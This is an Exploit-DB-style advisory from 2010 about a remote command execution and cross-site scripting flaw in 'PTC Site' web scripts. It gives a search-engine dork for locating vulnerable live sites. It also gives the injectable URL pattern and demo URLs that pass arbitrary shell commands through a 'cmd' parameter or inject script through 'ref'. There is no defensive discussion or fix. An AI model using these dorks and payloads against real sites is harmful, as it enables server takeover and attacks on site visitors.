PTC Site's RCE/XSS Vulnerability



EDB-ID: 12808 CVE: N/A OSVDB-ID: N/A
Author: CrazyMember Published: 2010-05-30 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

@Title: PTC Site's RCE/XSS Vulnerability
@Vendor: http://www.ptcsites4sale.info & and etc...:D
@Author: CrazyMember
@SPC Thanks: XroGuE 4 r3p0r7 :P 
@Dork:"intext:Warning: passthru()" "inurl:view=help"

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

@Bug: http://[site]/index.php?view=help&faq=1&ref=[RCE/XSS/HTML]

Demo: 

#http://[site]/index.php?view=help&faq=1&ref=marykarma&cmd=[Your Commond]
#http://[site]/index.php?view=help&faq=1&ref=[Your ScripT]

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$